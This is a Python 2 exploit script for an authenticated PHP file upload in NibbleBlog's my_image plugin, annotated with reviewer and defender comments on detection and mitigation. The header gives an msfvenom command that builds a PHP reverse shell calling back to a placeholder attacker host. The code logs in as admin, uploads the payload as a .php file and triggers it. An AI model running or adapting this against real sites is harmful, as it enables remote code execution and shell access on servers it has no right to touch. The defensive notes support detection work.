#!/usr/bin/python
#
# Your PHP Payload goes into local file nibble.txt
# msfvenom -p php/reverse_perl --format raw -o nibble.txt LHOST=ATTACKER LPORT=ATTACKER
#
# Loosely ported from the NibbleBlog File Upload MSF Module
#
# Twitter: @a7kemc73
#
# What the script does, as visible in the code below:
#   1. Logs in to the NibbleBlog admin panel (admin.php) with the configured
#      credentials; it stops if the login is rejected, so a valid admin
#      account is a precondition.
#   2. POSTs the "my_image" plugin configuration form with a PHP file in the
#      form's "image" field.
#   3. Requests content/private/plugins/my_image/image.php, where the script
#      expects the upload to be reachable.
#      NOTE(review): presumably the plugin stores the upload as image.<ext>
#      and keeps the client-supplied extension; confirm against the plugin.
#
# Defender notes:
#   - Detection: the request pattern is a POST to
#     admin.php?controller=plugins&action=config&plugin=my_image followed by
#     a GET of content/private/plugins/my_image/image.php in the same session.
#     The upload filename 'nibbles.php', content type 'application/x-php' and
#     caption 'He4dTr1p' are fixed strings in this script and can be matched
#     in request-body logs. The requests library's default User-Agent is only
#     a weak indicator.
#   - Host artifact: a .php file under content/private/plugins/my_image/.
#   - Mitigation: validate upload type and extension server-side, keep the
#     web server from executing scripts under the content/ tree, remove the
#     my_image plugin if unused, and protect the admin login (strong unique
#     credentials, rate limiting).
#
# The print statements are Python 2 syntax. The original indentation was lost
# on this page; the nesting below is a reconstruction from the control flow.

import requests

# Verbosity: > 0 prints status lines, > 1 also prints full response bodies.
DEBUG=1

# Admin credentials and base URL are left blank / pointed at localhost here.
nibbleUsername = ""
nibblePassword = ""
nibbleURL = "http://127.0.0.1/nibbleblog/"
loginURL = nibbleURL + "admin.php"
uploadURL = nibbleURL + "admin.php?controller=plugins&action=config&plugin=my_image"
exploitURL = nibbleURL + "content/private/plugins/my_image/image.php"

# Upload body = prefix literal + contents of nibble.txt + trailing echo.
# NOTE(review): the prefix literal looks damaged by page extraction; it is
# reproduced exactly as found.
body='";'
with open('nibble.txt', 'r') as payload:
    body=body + payload.read()
body=body + 'echo "Check for shell!"; ?>'

with requests.Session() as web:
    # Getting login session and cookies: the Session object carries cookies
    # from the GET into the login POST and all later requests.
    loginGetResp = web.get(loginURL)
    loginPostResp = web.post(loginURL, data={'username':nibbleUsername,'password':nibblePassword})
    if DEBUG > 0:
        print '[-] LOGIN RESPONSE: ' + str(loginPostResp.status_code) + " " + str(loginPostResp.reason)
    if DEBUG > 1:
        print '\n' + loginPostResp.text
    # Login success is inferred only from the absence of this error string in
    # the response body, not from the status code.
    if 'Incorrect username or password.' in loginPostResp.text:
        print '[!] Login Failed.'
    else:
        # Performing File Upload: the plugin settings form is submitted with
        # a .php filename and PHP content type in the "image" field.
        print '[+] Login Successful.'
        uploadPostResp = web.post(uploadURL, data={'plugin':'my_image','title':'My image','position':'4','caption':'He4dTr1p','image_resize':'1','image_width':'230','image_height':'200','image_option':'auto'}, files={'image': ('nibbles.php', body, 'application/x-php')}, timeout=30)
        if DEBUG > 0:
            # The script treats the substring 'Warning' in the response as a
            # sign the file was accepted.
            # NOTE(review): presumably a PHP warning from resizing a
            # non-image; such warnings in responses or error logs are a
            # useful server-side indicator. Confirm.
            if 'Warning' in uploadPostResp.text:
                print '[-] Upload likely successful.'
            else:
                print '[-] Upload likely failed.'
        if DEBUG > 0:
            print '[-] UPLOAD RESPONSE: ' + str(uploadPostResp.status_code) + ' ' + str(uploadPostResp.reason)
        if DEBUG > 1:
            print '\n' + uploadPostResp.text
        # Executing Upload: a GET of the stored file. HTTP 200 only shows the
        # path was served; the script does not verify anything beyond that.
        exploitResp = web.get(exploitURL)
        if exploitResp.status_code == 200:
            print '[+] Exploit launched, check for shell.'
        else:
            print '[!] Exploit failed.'
        # NOTE(review): placed inside the else branch because exploitResp is
        # only assigned there; the page's indentation does not show this.
        if DEBUG > 0:
            print '[-] EXPLOIT RESPONSE: ' + str(exploitResp.status_code) + ' ' + str(exploitResp.reason)
        if DEBUG > 1:
            print '\n' + exploitResp.text